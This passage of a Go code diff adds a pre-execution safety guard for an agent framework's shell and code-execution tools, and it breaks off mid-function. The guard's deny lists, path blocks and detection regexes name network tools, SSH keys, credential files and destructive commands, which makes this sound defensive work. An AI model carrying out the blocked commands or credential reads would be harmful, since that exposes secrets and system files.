+			ReadOnly:        req.Metadata.ReadOnly,
+			Destructive:     req.Metadata.Destructive,
+			ConcurrencySafe: req.Metadata.ConcurrencySafe,
+			SearchOrRead:    req.Metadata.SearchOrRead,
+			OpenWorld:       req.Metadata.OpenWorld,
+			MaxResultSize:   req.Metadata.MaxResultSize,
+		},
+	}
+	switch toolName {
+	case "workspace_exec":
+		return parseExecLikeArgs(base, req.Arguments, BackendWorkspaceExec, "cwd")
+	case "exec_command":
+		return parseExecLikeArgs(base, req.Arguments, BackendHostExec, "workdir")
+	case "execute_code":
+		return parseCodeExecArgs(base, req.Arguments)
+	default:
+		return Request{}, false, nil
+	}
+}
+
+type execLikeArgs struct {
+	Command       string            `json:"command"`
+	Cwd           string            `json:"cwd"`
+	Workdir       string            `json:"workdir"`
+	Env           map[string]string `json:"env"`
+	Background    bool              `json:"background"`
+	Timeout       int               `json:"timeout"`
+	TimeoutSec    *int              `json:"timeout_sec"`
+	TimeoutSecOld *int              `json:"timeoutSec"`
+	TTY           *bool             `json:"tty"`
+	PTY           *bool             `json:"pty"`
+}
+
+func parseExecLikeArgs(
+	base Request,
+	args []byte,
+	backend string,
+	cwdField string,
+) (Request, bool, error) {
+	var in execLikeArgs
+	if err := json.Unmarshal(args, &in); err != nil {
+		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
+	}
+	timeout := in.Timeout
+	if timeout <= 0 {
+		if in.TimeoutSec != nil {
+			timeout = *in.TimeoutSec
+		} else if in.TimeoutSecOld != nil {
+			timeout = *in.TimeoutSecOld
+		}
+	}
+	cwd := in.Cwd
+	if cwdField == "workdir" {
+		cwd = in.Workdir
+	}
+	base.Command = in.Command
+	base.Cwd = cwd
+	base.Env = in.Env
+	base.Backend = backend
+	base.TimeoutSeconds = timeout
+	base.Background = in.Background
+	base.TTY = boolValue(in.TTY) || boolValue(in.PTY)
+	return base, true, nil
+}
+
+type codeExecArgs struct {
+	CodeBlocks json.RawMessage `json:"code_blocks"`
+}
+
+func parseCodeExecArgs(base Request, args []byte) (Request, bool, error) {
+	var in codeExecArgs
+	if err := json.Unmarshal(args, &in); err != nil {
+		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
+	}
+	blocks, err := parseCodeBlocks(in.CodeBlocks)
+	if err != nil {
+		return Request{}, false, err
+	}
+	base.Backend = BackendCodeExec
+	base.CodeBlocks = blocks
+	return base, true, nil
+}
+
+func parseCodeBlocks(raw json.RawMessage) ([]CodeBlock, error) {
+	if len(raw) == 0 {
+		return nil, nil
+	}
+	var val any
+	if err := json.Unmarshal(raw, &val); err != nil {
+		return nil, fmt.Errorf("tool safety guard: invalid code_blocks: %w", err)
+	}
+	if s, ok := val.(string); ok {
+		raw = json.RawMessage(s)
+		if err := json.Unmarshal(raw, &val); err != nil {
+			return nil, fmt.Errorf("tool safety guard: invalid code_blocks: %w", err)
+		}
+	}
+	switch val.(type) {
+	case []any:
+		var blocks []CodeBlock
+		if err := json.Unmarshal(raw, &blocks); err != nil {
+			return nil, err
+		}
+		return blocks, nil
+	case map[string]any:
+		var block CodeBlock
+		if err := json.Unmarshal(raw, &block); err != nil {
+			return nil, err
+		}
+		return []CodeBlock{block}, nil
+	default:
+		return nil, fmt.Errorf("tool safety guard: code_blocks must be array, object, or string")
+	}
+}
+
+func boolValue(v *bool) bool {
+	return v != nil && *v
+}

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -57,7 +57,7 @@ func (p *PermissionPolicy) CheckToolPermission(
 ) (tool.PermissionDecision, error) {
 	_ = ctx
 	if p == nil {
-		return tool.AllowPermission(), nil
+		return tool.DenyPermission("tool safety guard permission policy is nil"), nil
 	}
 	scanReq, ok, err := RequestFromPermissionRequest(req)
 	if err != nil {
@@ -199,13 +199,16 @@ func parseCodeExecArgs(base Request, args []byte) (Request, bool, error) {
 	if err != nil {
 		return Request{}, false, err
 	}
+	if len(blocks) == 0 {
+		return Request{}, false, nil
+	}
 	base.Backend = BackendCodeExec
 	base.CodeBlocks = blocks
 	return base, true, nil
 }
 
 func parseCodeBlocks(raw json.RawMessage) ([]CodeBlock, error) {
-	if len(raw) == 0 {
+	if len(raw) == 0 || strings.EqualFold(strings.TrimSpace(string(raw)), "null") {
 		return nil, nil
 	}
 	var val any

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -1,0 +1,1098 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+// Package safety provides a pre-execution safety guard for command and
+// code-execution tools.
+package safety
+
+import (
+	"bufio"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"net/url"
+	"os"
+	"path/filepath"
+	"regexp"
+	"slices"
+	"strconv"
+	"strings"
+	"time"
+
+	"gopkg.in/yaml.v3"
+
+	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
+)
+
+const (
+	// DecisionAllow allows a tool invocation to execute.
+	DecisionAllow Decision = "allow"
+	// DecisionDeny blocks a tool invocation before execution.
+	DecisionDeny Decision = "deny"
+	// DecisionNeedsHumanReview asks a human to approve the invocation.
+	DecisionNeedsHumanReview Decision = "needs_human_review"
+	// DecisionAsk is a lighter approval-required decision for uncertain cases.
+	DecisionAsk Decision = "ask"
+
+	// RiskLow is informational risk.
+	RiskLow RiskLevel = "low"
+	// RiskMedium is review-worthy risk.
+	RiskMedium RiskLevel = "medium"
+	// RiskHigh is likely dangerous risk.
+	RiskHigh RiskLevel = "high"
+	// RiskCritical is immediately dangerous risk.
+	RiskCritical RiskLevel = "critical"
+
+	// BackendWorkspaceExec identifies workspace_exec style shell execution.
+	BackendWorkspaceExec = "workspaceexec"
+	// BackendHostExec identifies direct host shell execution.
+	BackendHostExec = "hostexec"
+	// BackendCodeExec identifies codeexec/codeexecutor execution.
+	BackendCodeExec = "codeexec"
+)
+
+// Decision is the pre-execution safety decision.
+type Decision string
+
+// RiskLevel is the severity assigned to a scan report.
+type RiskLevel string
+
+// Policy controls how commands and scripts are scanned.
+type Policy struct {
+	AllowedCommands      []string `json:"allowed_commands,omitempty" yaml:"allowed_commands,omitempty"`
+	DeniedCommands       []string `json:"denied_commands,omitempty" yaml:"denied_commands,omitempty"`
+	DeniedPaths          []string `json:"denied_paths,omitempty" yaml:"denied_paths,omitempty"`
+	NetworkAllowlist     []string `json:"network_allowlist,omitempty" yaml:"network_allowlist,omitempty"`
+	MaxTimeoutSeconds    int      `json:"max_timeout_seconds,omitempty" yaml:"max_timeout_seconds,omitempty"`
+	MaxOutputBytes       int64    `json:"max_output_bytes,omitempty" yaml:"max_output_bytes,omitempty"`
+	EnvAllowlist         []string `json:"env_allowlist,omitempty" yaml:"env_allowlist,omitempty"`
+	ReviewCommands       []string `json:"review_commands,omitempty" yaml:"review_commands,omitempty"`
+	ReviewShellPipelines bool     `json:"review_shell_pipelines,omitempty" yaml:"review_shell_pipelines,omitempty"`
+	DenyOnParseError     bool     `json:"deny_on_parse_error,omitempty" yaml:"deny_on_parse_error,omitempty"`
+
+	loaded bool
+}
+
+// DefaultPolicy returns a conservative policy suitable for workspaceexec,
+// hostexec and codeexec wrappers.
+func DefaultPolicy() Policy {
+	return Policy{
+		DeniedCommands: []string{
+			"dd", "mkfs", "mount", "umount", "shutdown", "reboot",
+			"halt", "poweroff", "sudo", "su", "doas",
+		},
+		DeniedPaths: []string{
+			"/", "/bin", "/boot", "/dev", "/etc", "/lib", "/lib64",
+			"/proc", "/root", "/sbin", "/sys", "/usr", "/var",
+			"~/.ssh", ".ssh", ".env", ".npmrc", ".pypirc",
+			"id_rsa", "id_ed25519", "credentials", "credential",
+			"secrets", "secret",
+		},
+		NetworkAllowlist: []string{
+			"api.github.com", "github.com", "proxy.golang.org",
+			"sum.golang.org", "registry.npmjs.org", "pypi.org",
+			"files.pythonhosted.org",
+		},
+		MaxTimeoutSeconds:    300,
+		MaxOutputBytes:       4 * 1024 * 1024,
+		ReviewShellPipelines: true,
+		DenyOnParseError:     true,
+		ReviewCommands: []string{
+			"go install", "npm install", "npm ci", "pip install",
+			"pip3 install", "apt install", "apt-get install",
+			"brew install", "cargo install",
+		},
+		EnvAllowlist: []string{
+			"PATH", "HOME", "TMPDIR", "TEMP", "TMP", "LANG", "LC_ALL",
+			"CGO_ENABLED", "GOCACHE", "GOMODCACHE", "GOPATH",
+		},
+	}
+}
+
+// LoadPolicy loads a JSON or YAML policy file. Empty policy fields inherit
+// their defaults so operators can override only the knobs they need.
+func LoadPolicy(path string) (Policy, error) {
+	b, err := os.ReadFile(path)
+	if err != nil {
+		return Policy{}, err
+	}
+	p := DefaultPolicy()
+	switch strings.ToLower(filepath.Ext(path)) {
+	case ".json":
+		err = json.Unmarshal(b, &p)
+	case ".yaml", ".yml", "":
+		err = yaml.Unmarshal(b, &p)
+	default:
+		err = fmt.Errorf("unsupported policy extension %q", filepath.Ext(path))
+	}
+	if err != nil {
+		return Policy{}, err
+	}
+	p.loaded = true
+	return p, nil
+}
+
+func (p Policy) withDefaults() Policy {
+	d := DefaultPolicy()
+	if p.DeniedCommands == nil {
+		p.DeniedCommands = d.DeniedCommands
+	}
+	if p.DeniedPaths == nil {
+		p.DeniedPaths = d.DeniedPaths
+	}
+	if p.NetworkAllowlist == nil {
+		p.NetworkAllowlist = d.NetworkAllowlist
+	}
+	if p.MaxTimeoutSeconds == 0 {
+		p.MaxTimeoutSeconds = d.MaxTimeoutSeconds
+	}
+	if p.MaxOutputBytes == 0 {
+		p.MaxOutputBytes = d.MaxOutputBytes
+	}
+	if p.EnvAllowlist == nil {
+		p.EnvAllowlist = d.EnvAllowlist
+	}
+	if p.ReviewCommands == nil {
+		p.ReviewCommands = d.ReviewCommands
+	}
+	if !p.loaded && !p.ReviewShellPipelines {
+		p.ReviewShellPipelines = d.ReviewShellPipelines
+	}
+	if !p.loaded && !p.DenyOnParseError {
+		p.DenyOnParseError = d.DenyOnParseError
+	}
+	return p
+}
+
+// ToolMetadata captures the execution-relevant metadata used by the guard.
+type ToolMetadata struct {
+	ReadOnly        bool `json:"read_only,omitempty"`
+	Destructive     bool `json:"destructive,omitempty"`
+	ConcurrencySafe bool `json:"concurrency_safe,omitempty"`
+	SearchOrRead    bool `json:"search_or_read,omitempty"`
+	OpenWorld       bool `json:"open_world,omitempty"`
+	MaxResultSize   int  `json:"max_result_size,omitempty"`
+}
+
+// CodeBlock is a script block supplied to a code execution tool.
+type CodeBlock struct {
+	Language string `json:"language,omitempty"`
+	Code     string `json:"code,omitempty"`
+}
+
+// Request describes one pending tool execution.
+type Request struct {
+	ToolName       string            `json:"tool_name,omitempty"`
+	Command        string            `json:"command,omitempty"`
+	Args           []string          `json:"args,omitempty"`
+	Cwd            string            `json:"cwd,omitempty"`
+	Env            map[string]string `json:"env,omitempty"`
+	Metadata       ToolMetadata      `json:"metadata,omitempty"`
+	Backend        string            `json:"backend,omitempty"`
+	TimeoutSeconds int               `json:"timeout_seconds,omitempty"`
+	MaxOutputBytes int64             `json:"max_output_bytes,omitempty"`
+	Background     bool              `json:"background,omitempty"`
+	TTY            bool              `json:"tty,omitempty"`
+	CodeBlocks     []CodeBlock       `json:"code_blocks,omitempty"`
+}
+
+// Finding is one matched safety rule.
+type Finding struct {
+	Decision       Decision  `json:"decision"`
+	RiskLevel      RiskLevel `json:"risk_level"`
+	RuleID         string    `json:"rule_id"`
+	Evidence       []string  `json:"evidence"`
+	Recommendation string    `json:"recommendation"`
+}
+
+// Report is the structured pre-execution scan result.
+type Report struct {
+	Decision       Decision  `json:"decision"`
+	RiskLevel      RiskLevel `json:"risk_level"`
+	RuleID         string    `json:"rule_id,omitempty"`
+	Evidence       []string  `json:"evidence,omitempty"`
+	Recommendation string    `json:"recommendation,omitempty"`
+	ToolName       string    `json:"tool_name,omitempty"`
+	Command        string    `json:"command,omitempty"`
+	Backend        string    `json:"backend,omitempty"`
+	Blocked        bool      `json:"blocked"`
+	Redacted       bool      `json:"redacted"`
+	DurationMillis int64     `json:"duration_ms"`
+	SafeSummary    string    `json:"safe_summary,omitempty"`
+	Findings       []Finding `json:"findings,omitempty"`
+}
+
+// AuditEvent is the JSONL-friendly monitoring event emitted for every scan.
+type AuditEvent struct {
+	Timestamp      string    `json:"timestamp"`
+	ToolName       string    `json:"tool_name,omitempty"`
+	Decision       Decision  `json:"decision"`
+	RiskLevel      RiskLevel `json:"risk_level"`
+	RuleID         string    `json:"rule_id,omitempty"`
+	DurationMillis int64     `json:"duration_ms"`
+	Redacted       bool      `json:"redacted"`
+	Blocked        bool      `json:"blocked"`
+	Backend        string    `json:"backend,omitempty"`
+}
+
+// SpanAttributes returns OpenTelemetry-ready attribute keys for callers that
+// want to attach scan outcomes to an active span.
+func (r Report) SpanAttributes() map[string]string {
+	return map[string]string{
+		"tool.safety.decision":   string(r.Decision),
+		"tool.safety.risk_level": string(r.RiskLevel),
+		"tool.safety.rule_id":    r.RuleID,
+		"tool.safety.backend":    r.Backend,
+	}
+}
+
+// AuditEvent returns the structured monitoring event for the report.
+func (r Report) AuditEvent(now time.Time) AuditEvent {
+	return AuditEvent{
+		Timestamp:      now.UTC().Format(time.RFC3339Nano),
+		ToolName:       r.ToolName,
+		Decision:       r.Decision,
+		RiskLevel:      r.RiskLevel,
+		RuleID:         r.RuleID,
+		DurationMillis: r.DurationMillis,
+		Redacted:       r.Redacted,
+		Blocked:        r.Blocked,
+		Backend:        r.Backend,
+	}
+}
+
+// WriteAuditJSONL writes one audit event as a JSONL record.
+func WriteAuditJSONL(w io.Writer, report Report) error {
+	if w == nil {
+		return nil
+	}
+	b, err := json.Marshal(report.AuditEvent(time.Now()))
+	if err != nil {
+		return err
+	}
+	bw := bufio.NewWriter(w)
+	if _, err := bw.Write(b); err != nil {
+		return err
+	}
+	if err := bw.WriteByte('\n'); err != nil {
+		return err
+	}
+	return bw.Flush()
+}
+
+// AppendAuditFile appends one report event to a JSONL audit file.
+func AppendAuditFile(path string, report Report) error {
+	if strings.TrimSpace(path) == "" {
+		return nil
+	}
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	return WriteAuditJSONL(f, report)
+}
+
+// Scan evaluates a pending tool execution against the policy.
+func Scan(req Request, policy Policy) Report {
+	start := time.Now()
+	policy = policy.withDefaults()
+	s := scanner{policy: policy}
+	report := s.scan(req)
+	report.DurationMillis = time.Since(start).Milliseconds()
+	return report
+}
+
+type scanner struct {
+	policy Policy
+}
+
+func (s scanner) scan(req Request) Report {
+	redactor := newRedactor()
+	cmd := requestCommand(req)
+	findings := make([]Finding, 0, 4)
+	findings = append(findings, s.scanMetadata(req)...)
+	findings = append(findings, s.scanEnv(req.Env)...)
+	if len(req.CodeBlocks) > 0 {
+		for _, block := range req.CodeBlocks {
+			findings = append(findings, s.scanCodeBlock(block)...)
+		}
+	} else {
+		findings = append(findings, s.scanShell(req, cmd)...)
+	}
+	report := s.reportFromFindings(req, cmd, findings, redactor)
+	report.Command = redactor.redact(report.Command)
+	report.Evidence = redactList(redactor, report.Evidence)
+	report.Recommendation = redactor.redact(report.Recommendation)
+	report.SafeSummary = redactor.redact(report.SafeSummary)
+	for i := range report.Findings {
+		report.Findings[i].Evidence = redactList(redactor, report.Findings[i].Evidence)
+		report.Findings[i].Recommendation = redactor.redact(report.Findings[i].Recommendation)
+	}
+	report.Redacted = redactor.changed
+	return report
+}
+
+func (s scanner) reportFromFindings(
+	req Request,
+	command string,
+	findings []Finding,
+	redactor *redactor,
+) Report {
+	best := Finding{
+		Decision:       DecisionAllow,
+		RiskLevel:      RiskLow,
+		Recommendation: "Command matched no high-risk safety rules.",
+	}
+	for _, f := range findings {
+		if findingBeats(f, best) {
+			best = f
+		}
+	}
+	decision := best.Decision
+	blocked := decision == DecisionDeny ||
+		decision == DecisionAsk ||
+		decision == DecisionNeedsHumanReview
+	summary := ""
+	if decision == DecisionAllow {
+		summary = safeSummary(req, command)
+	}
+	return Report{
+		Decision:       decision,
+		RiskLevel:      best.RiskLevel,
+		RuleID:         best.RuleID,
+		Evidence:       best.Evidence,
+		Recommendation: best.Recommendation,
+		ToolName:       req.ToolName,
+		Command:        redactor.redact(command),
+		Backend:        req.Backend,
+		Blocked:        blocked,
+		SafeSummary:    summary,
+		Findings:       findings,
+	}
+}
+
+func safeSummary(req Request, command string) string {
+	if len(req.CodeBlocks) > 0 {
+		return fmt.Sprintf(
+			"%s scan allowed %d code block(s); no high-risk network, path, "+
+				"shell, resource, dependency, or secret patterns matched.",
+			req.Backend, len(req.CodeBlocks))
+	}
+	return fmt.Sprintf(
+		"%s scan allowed command %q; no high-risk network, path, shell, "+
+			"resource, dependency, or secret patterns matched.",
+		req.Backend, command)
+}
+
+func requestCommand(req Request) string {
+	parts := make([]string, 0, 1+len(req.Args))
+	if strings.TrimSpace(req.Command) != "" {
+		parts = append(parts, strings.TrimSpace(req.Command))
+	}
+	parts = append(parts, req.Args...)
+	return strings.Join(parts, " ")
+}
+
+func findingBeats(a, b Finding) bool {
+	if decisionRank(a.Decision) != decisionRank(b.Decision) {
+		return decisionRank(a.Decision) > decisionRank(b.Decision)
+	}
+	return riskRank(a.RiskLevel) > riskRank(b.RiskLevel)
+}
+
+func decisionRank(d Decision) int {
+	switch d {
+	case DecisionDeny:
+		return 4
+	case DecisionNeedsHumanReview:
+		return 3
+	case DecisionAsk:
+		return 2
+	case DecisionAllow:
+		return 1
+	default:
+		return 0
+	}
+}
+
+func riskRank(level RiskLevel) int {
+	switch level {
+	case RiskCritical:
+		return 4
+	case RiskHigh:
+		return 3
+	case RiskMedium:
+		return 2
+	case RiskLow:
+		return 1
+	default:
+		return 0
+	}
+}
+
+func (s scanner) scanShell(req Request, command string) []Finding {
+	var findings []Finding
+	command = strings.TrimSpace(command)
+	if command == "" {
+		return []Finding{newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"command.empty",
+			[]string{"command is empty"},
+			"Provide an explicit command before invoking the tool.",
+		)}
+	}
+	findings = append(findings, s.scanRawCommand(req, command)...)
+	pipe, err := shellsafe.Parse(command)
+	if err != nil {
+		decision := DecisionAsk
+		if s.policy.DenyOnParseError {
+			decision = DecisionDeny
+		}
+		findings = append(findings, newFinding(
+			decision,
+			RiskHigh,
+			"shellsafe.parse_error",
+			[]string{err.Error()},
+			"Rewrite the command without shell expansion, redirection, "+
+				"subshells, background operators, or other unsupported shell syntax.",
+		))
+		return findings
+	}
+	findings = append(findings, s.scanParsedCommands(pipe)...)
+	return findings
+}
+
+func (s scanner) scanRawCommand(req Request, command string) []Finding {
+	var findings []Finding
+	lower := strings.ToLower(command)
+	findings = append(findings, s.scanSecretText(command, "command")...)
+	if s.pathDenied(req.Cwd) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"sensitive.cwd_access",
+			[]string{fmt.Sprintf("working directory %q is denied", req.Cwd)},
+			"Choose a workspace-relative working directory that does not "+
+				"point at system paths, SSH material, credentials, or secrets.",
+		))
+	}
+	if hasShellBypass(lower) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"shell.bypass",
+			[]string{"command contains shell bypass syntax or wrapper"},
+			"Avoid sh -c, bash -c, eval, backticks, $(), variable expansion, "+
+				"redirections, and process substitutions in tool commands.",
+		))
+	}
+	findings = append(findings, s.scanNetwork(command)...)
+	if s.policy.ReviewShellPipelines && containsPipeline(command) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"shell.pipeline_review",
+			[]string{"command contains a shell pipeline or command chain"},
+			"Review multi-stage shell commands manually or replace them with "+
+				"a small audited script.",
+		))
+	}
+	if req.Backend == BackendHostExec && (req.Background || req.TTY) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"hostexec.long_session",
+			[]string{"hostexec requested background or PTY execution"},
+			"Require human approval for host PTY/background sessions and "+
+				"ensure timeout, process-group cleanup, and output caps are enforced.",
+		))
+	}
+	if req.Background || strings.Contains(lower, " &") || strings.HasSuffix(lower, "&") {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"process.background",
+			[]string{"command may leave a background process behind"},
+			"Run foreground commands with a bounded timeout, or record the "+
+				"session id and cleanup plan.",
+		))
+	}
+	if req.TimeoutSeconds > s.policy.MaxTimeoutSeconds {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.timeout_exceeded",
+			[]string{fmt.Sprintf("timeout %ds exceeds policy max %ds",
+				req.TimeoutSeconds, s.policy.MaxTimeoutSeconds)},
+			"Use a shorter timeout or update the safety policy after review.",
+		))
+	}
+	if req.MaxOutputBytes > s.policy.MaxOutputBytes {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.output_limit_exceeded",
+			[]string{fmt.Sprintf("requested output cap %d exceeds policy max %d",
+				req.MaxOutputBytes, s.policy.MaxOutputBytes)},
+			"Lower the output cap or collect a bounded artifact instead.",
+		))
+	}
+	findings = append(findings, s.scanResourcePatterns(lower)...)
+	return findings
+}
+
+func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
+	var findings []Finding
+	for _, argv := range pipe.Commands {
+		if len(argv) == 0 {
+			continue
+		}
+		name := commandName(argv[0])
+		full := strings.Join(argv, " ")
+		if s.commandDenied(name) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskHigh,
+				"policy.denied_command",
+				[]string{fmt.Sprintf("command %q is denied", name)},
+				"Remove the denied command or change the policy after review.",
+			))
+		}
+		if len(s.policy.AllowedCommands) > 0 && !s.commandAllowed(name) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskMedium,
+				"policy.command_not_allowed",
+				[]string{fmt.Sprintf("command %q is not in allowed_commands", name)},
+				"Use an allowed command or update allowed_commands in the policy.",
+			))
+		}
+		findings = append(findings, s.scanDangerousCommand(name, argv)...)
+		findings = append(findings, s.scanReviewCommand(full)...)
+		findings = append(findings, s.scanDeniedPaths(argv)...)
+	}
+	return findings
+}
+
+func (s scanner) scanDangerousCommand(name string, argv []string) []Finding {
+	var findings []Finding
+	if name == "rm" && destructiveRM(argv) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"dangerous.rm_rf",
+			[]string{strings.Join(argv, " ")},
+			"Do not run recursive forced deletion through tool execution.",
+		))
+	}
+	if name == "chmod" && containsArg(argv, "-R") {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"dangerous.recursive_chmod",
+			[]string{strings.Join(argv, " ")},
+			"Review recursive permission changes before executing.",
+		))
+	}
+	return findings
+}
+
+func destructiveRM(argv []string) bool {
+	recursive := false
+	force := false
+	targetSystem := false
+	for _, arg := range argv[1:] {
+		if strings.HasPrefix(arg, "-") {
+			if strings.Contains(arg, "r") || strings.Contains(arg, "R") {
+				recursive = true
+			}
+			if strings.Contains(arg, "f") {
+				force = true
+			}
+			continue
+		}
+		if isSystemPath(arg) {
+			targetSystem = true
+		}
+	}
+	return recursive && (force || targetSystem)
+}
+
+func isSystemPath(path string) bool {
+	p := strings.TrimSpace(strings.Trim(path, `"'`))
+	if p == "" {
+		return false
+	}
+	if p == "/" || p == "\\" {
+		return true
+	}
+	p = strings.ReplaceAll(p, "\\", "/")
+	system := []string{
+		"/bin", "/boot", "/dev", "/etc", "/lib", "/lib64", "/proc",
+		"/root", "/sbin", "/sys", "/usr", "/var",
+		"c:/windows", "c:/program files", "c:/programdata",
+	}
+	lp := strings.ToLower(p)
+	return slices.ContainsFunc(system, func(prefix string) bool {
+		return lp == prefix || strings.HasPrefix(lp, prefix+"/")
+	})
+}
+
+func (s scanner) scanReviewCommand(command string) []Finding {
+	lower := strings.ToLower(strings.TrimSpace(command))
+	for _, review := range s.policy.ReviewCommands {
+		r := strings.ToLower(strings.TrimSpace(review))
+		if r != "" && strings.HasPrefix(lower, r) {
+			return []Finding{newFinding(
+				DecisionNeedsHumanReview,
+				RiskMedium,
+				"dependency.environment_change",
+				[]string{fmt.Sprintf("command starts with %q", review)},
+				"Dependency installation or environment mutation should be "+
+					"reviewed and pinned before execution.",
+			)}
+		}
+	}
+	return nil
+}
+
+func (s scanner) scanDeniedPaths(argv []string) []Finding {
+	var findings []Finding
+	for _, arg := range argv[1:] {
+		clean := strings.Trim(arg, `"'`)
+		if s.pathDenied(clean) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskCritical,
+				"sensitive.path_access",
+				[]string{fmt.Sprintf("argument references denied path %q", clean)},
+				"Do not access SSH keys, .env files, credential stores, or "+
+					"system directories from tool execution.",
+			))
+		}
+	}
+	return findings
+}
+
+func (s scanner) pathDenied(path string) bool {
+	if path == "" {
+		return false
+	}
+	normalized := normalizePathForMatch(path)
+	for _, denied := range s.policy.DeniedPaths {
+		d := normalizePathForMatch(denied)
+		if d == "" {
+			continue
+		}
+		if normalized == d ||
+			strings.Contains(normalized, "/"+d+"/") ||
+			strings.HasSuffix(normalized, "/"+d) ||
+			strings.HasPrefix(normalized, d+"/") {
+			return true
+		}
+	}
+	return false
+}
+
+func normalizePathForMatch(path string) string {
+	p := strings.TrimSpace(strings.Trim(path, `"'`))
+	p = strings.ReplaceAll(p, "\\", "/")
+	p = strings.TrimPrefix(p, "~/")
+	p = strings.TrimPrefix(p, "./")
+	p = strings.ToLower(p)
+	return strings.Trim(p, "/")
+}
+
+func (s scanner) scanNetwork(command string) []Finding {
+	var findings []Finding
+	lower := strings.ToLower(command)
+	networkCommand := regexp.MustCompile(`(^|[;&|]\s*)(curl|wget|nc|netcat|ssh|scp|rsync)\b`).
+		FindString(lower) != ""
+	urls := extractURLs(command)
+	for _, raw := range urls {
+		host := hostOf(raw)
+		if host == "" {
+			continue
+		}
+		if !s.hostAllowed(host) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskHigh,
+				"network.non_whitelisted_domain",
+				[]string{fmt.Sprintf("domain %q is not in network_allowlist", host)},
+				"Use a whitelisted domain or update network_allowlist after review.",
+			))
+		}
+	}
+	if networkCommand && len(urls) == 0 {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"network.unresolved_target",
+			[]string{"network-capable command has no parseable URL target"},
+			"Review the target manually or provide an explicit whitelisted URL.",
+		))
+	}
+	return findings
+}
+
+func extractURLs(s string) []string {
+	re := regexp.MustCompile(`https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+`)
+	return re.FindAllString(s, -1)
+}
+
+func hostOf(raw string) string {
+	u, err := url.Parse(raw)
+	if err != nil {
+		return ""
+	}
+	return strings.ToLower(u.Hostname())
+}
+
+func (s scanner) hostAllowed(host string) bool {
+	if host == "" {
+		return false
+	}
+	for _, allowed := range s.policy.NetworkAllowlist {
+		a := strings.ToLower(strings.TrimSpace(allowed))
+		if a == "" {
+			continue
+		}
+		if host == a || strings.HasSuffix(host, "."+a) {
+			return true
+		}
+	}
+	return false
+}
+
+func (s scanner) scanResourcePatterns(lower string) []Finding {
+	var findings []Finding
+	if longSleep(lower) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"resource.long_sleep",
+			[]string{"command contains a long sleep"},
+			"Use a shorter sleep or a bounded wait condition.",
+		))
+	}
+	if infiniteLoop(lower) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.infinite_loop",
+			[]string{"command appears to contain an infinite loop"},
+			"Replace the unbounded loop with a bounded command and timeout.",
+		))
+	}
+	if largeOutput(lower, s.policy.MaxOutputBytes) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.large_output",
+			[]string{"command appears to generate output above the policy limit"},
+			"Limit output size, write bounded artifacts, or raise the policy "+
+				"limit after review.",
+		))
+	}
+	if highConcurrency(lower) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"resource.high_concurrency",
+			[]string{"command appears to start many concurrent workers"},
+			"Use a bounded, reviewed concurrency level before executing.",
+		))
+	}
+	return findings
+}
+
+func longSleep(lower string) bool {
+	re := regexp.MustCompile(`\bsleep\s+([0-9]+)`)
+	m := re.FindStringSubmatch(lower)
+	if len(m) != 2 {
+		return false
+	}
+	n, _ := strconv.Atoi(m[1])
+	return n > 300
+}
+
+func infiniteLoop(lower string) bool {
+	patterns := []string{
+		"while true", "while(true)", "for ;;", "for(;;)",
+		"while 1", "while(1)",
+	}
+	return slices.ContainsFunc(patterns, func(p string) bool {
+		return strings.Contains(lower, p)
+	})
+}
+
+func largeOutput(lower string, limit int64) bool {
+	head := regexp.MustCompile(`\bhead\s+-c\s+([0-9]+)`)
+	if m := head.FindStringSubmatch(lower); len(m) == 2 {
+		n, _ := strconv.ParseInt(m[1], 10, 64)
+		return n > limit
+	}
+	if strings.Contains(lower, "yes ") || strings.HasPrefix(lower, "yes") {
+		return true
+	}
+	printRepeat := regexp.MustCompile(`print\s*\([^)]*\*\s*([0-9]{7,})`)
+	return printRepeat.MatchString(lower)
+}
+
+func highConcurrency(lower string) bool {
+	xargs := regexp.MustCompile(`\bxargs\b[^;&|]*\s-p\s*([0-9]+)`)
+	if m := xargs.FindStringSubmatch(lower); len(m) == 2 {
+		n, _ := strconv.Atoi(m[1])
+		return n > 8
+	}
+	parallel := regexp.MustCompile(`\bparallel\b[^;&|]*(?:-j|--jobs)\s*([0-9]+)`)
+	if m := parallel.FindStringSubmatch(lower); len(m) == 2 {
+		n, _ := strconv.Atoi(m[1])
